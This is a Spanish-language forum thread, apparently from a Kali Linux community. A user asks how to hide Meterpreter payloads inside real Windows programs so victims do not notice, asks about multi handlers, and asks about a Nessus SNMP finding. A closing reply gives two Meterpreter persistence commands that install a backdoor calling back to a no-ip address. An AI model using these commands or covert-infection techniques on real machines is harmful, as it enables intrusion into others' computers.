Mensajes

[HOLA A TODOS MI PREGUNTA ES SIMPLE.YA HE APRENDIDO A CREAR PAYLOAD CON METERPRETER PARA INFECTAR UNA PC DENTRO DE MI RED. TAMBIEN LO REALICE INFECTANDO UN ARCHIVO PDF. AHORA LA PREGUNTA ¿SE PUEDE INFECTAR UNA PC AL MOMENTO DE EJECUTAR UN PROGRAMA REAL POR EJEMPLO OFFICE 2007 U OTRO PROGRAMA EJECUTABLE EN WINDOWS?]

HOLA A TODOS MI PREGUNTA ES SIMPLE.
YA HE APRENDIDO A CREAR PAYLOAD CON METERPRETER PARA INFECTAR UNA PC DENTRO DE MI RED. TAMBIEN LO REALICE INFECTANDO UN ARCHIVO PDF. AHORA LA PREGUNTA 
¿SE PUEDE  INFECTAR UNA PC AL MOMENTO DE EJECUTAR UN PROGRAMA REAL POR EJEMPLO OFFICE 2007 U OTRO PROGRAMA EJECUTABLE EN WINDOWS?

SERIA MAS PRACTICO INFECTAR UN PROGRAMA REAL CON UN PAYLOAD PARA QUE NO SE DE CUENTA LA VICTIMA....

GRACIAS POR LA AYUDA...

Muchas Gracias a todos por sus respuestas y sus retos que son de gran ayuda por que se lo dificil que es aprender ya que todos los dias van saliendo nuevas vulnerabilidades y hay que estar actualizandose y leyendo todos los dias algo nuevo.

La verdad es que llevo bastante tiempo en kali linux y se que existen miles de herramientas para poder realizar ataques,  me la paso viendo tutoriales y leyendo foros para poder aprender todos los dias un poco mas.

no utilzo windows hace años. pero aun asi todo los dias tengo que aprender cosas nuevas en linux porque es un sistema operativo que no para y todos los dias salen cosas nuevas



bueno amigos gracias por todo.. SALUDOS  

[gracias por sus respuestas... ahora ese ataque solo se puede hacer desde windows? o se puede instalar en kali linux con wine? no saben si existe un programa similar en linux? gracias por la ayuda se agradece...]

gracias por sus respuestas... ahora ese ataque solo se puede hacer desde windows?  o se puede instalar en kali linux con wine? no saben si existe un programa similar en linux? gracias por la ayuda se agradece...

[Hola de nuevo....Tengo una duda que no la he podido encontrar en la web ya que cada vez que hacen un ataque desde metasploit siempre el multi handler se encuentra en escucha al momento de que la victima ejecuta el archivo infectado.mi consulta es si se puede ejecutar un archivo infectado en la maquina victima sin tener el programa en escucha y conectarlo despues con multi handler.por favor si me pueden aclarar porque lo he tratado de hacer en local con maquinas virtuales y no se conecta.. gracias....]

Hola de nuevo....

Tengo una duda que no la he podido encontrar en la web ya que cada vez que hacen un ataque desde metasploit siempre el multi handler se encuentra en escucha al momento de que la victima ejecuta el archivo infectado.

mi consulta es si se puede ejecutar un archivo infectado en la maquina victima sin tener el programa en escucha y conectarlo despues con multi handler.

por favor si me pueden aclarar porque lo he tratado de hacer en local con maquinas virtuales y no se conecta..

gracias....

INSTALE NESSUS EN KALI LINUX PARA PROBAR Y VER LAS VULNERABILIDADES QUE PODIA ENCONTRAR EN MI RED Y ENCONTRO LO SIGUIENTE Y NO SE QUE SIGNIFICA..
ESTO SE PUEDE EXPLOTAR? YA VERDAD NO ENTIENDO MUCHO NESSUS PORQUE ACABO DE INSTALARLO Y ESTOY BUSCANDO ALGUN MANUAL QUE ME PUEDA AYUDAR A UTILIZARLO.
MUCHAS GRACIAS.


SNMP Agent Default Community Name (public)
Description
It is possible to obtain the default community name of the remote SNMP server.

An attacker may use this information to gain more knowledge about the remote host, or to change the configuration of the remote system (if the default community allows such modifications).
Solution
Disable the SNMP service on the remote host if you do not use it.
Either filter incoming UDP packets going to this port, or change the default community string.
Output

    The remote SNMP server replies to the following default community
    string :

    public

Plugin Details
Severity: high
ID: 41028
Version: $Revision: 1.10 $
Type: remote
Family: SNMP
Published: 2002/11/25
Modified: 2012/02/21


Risk Factor:  High
CVSS Base Score:  7.5
CVSS Vector:  CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS Temporal Vector:  CVSS2#E:F/RL:U/RC:ND
CVSS Temporal Score:  7.1

gracias por tu respuesta..
se puede saber a traves de los puertos abiertos de una pc si esa maquina esta conectada a internet?
por ejemplo el puerto 80-8080 etc, o no necesariamente este puerto abierto quiere decir eso?
gracias...

muchas gracias por tu respuesta...

Mi duda es la siguiente.
hay alguna manera de saber si un pc que pertenece a intranet se ha conectado a internet o tenga conexion a internet?
se puede hacer eso con un escaner de puertos si tiene salida a la web.
lo que pasa es que hay notebook que tienen las tarjetas wifi activadas y lo mas seguro que los usuarios la utilicen para conectarse con el celular.

bueno ojala puedan darme algunos metodos.

gracias...

hola aka te dejo los que utilizo y yo. aunque ultimamente he utilizado el persistence de armitage y funciona muy bien. trata de realizar las pruebas desde armitage y nos cuentas.

1)  run persistence -A -U -X -i -r (direccion no-ip) -p (puerto)

2)  run persistence -A -L C:\\ -X -i 10 -p (puerto) -r (direccion no-ip)

saludos...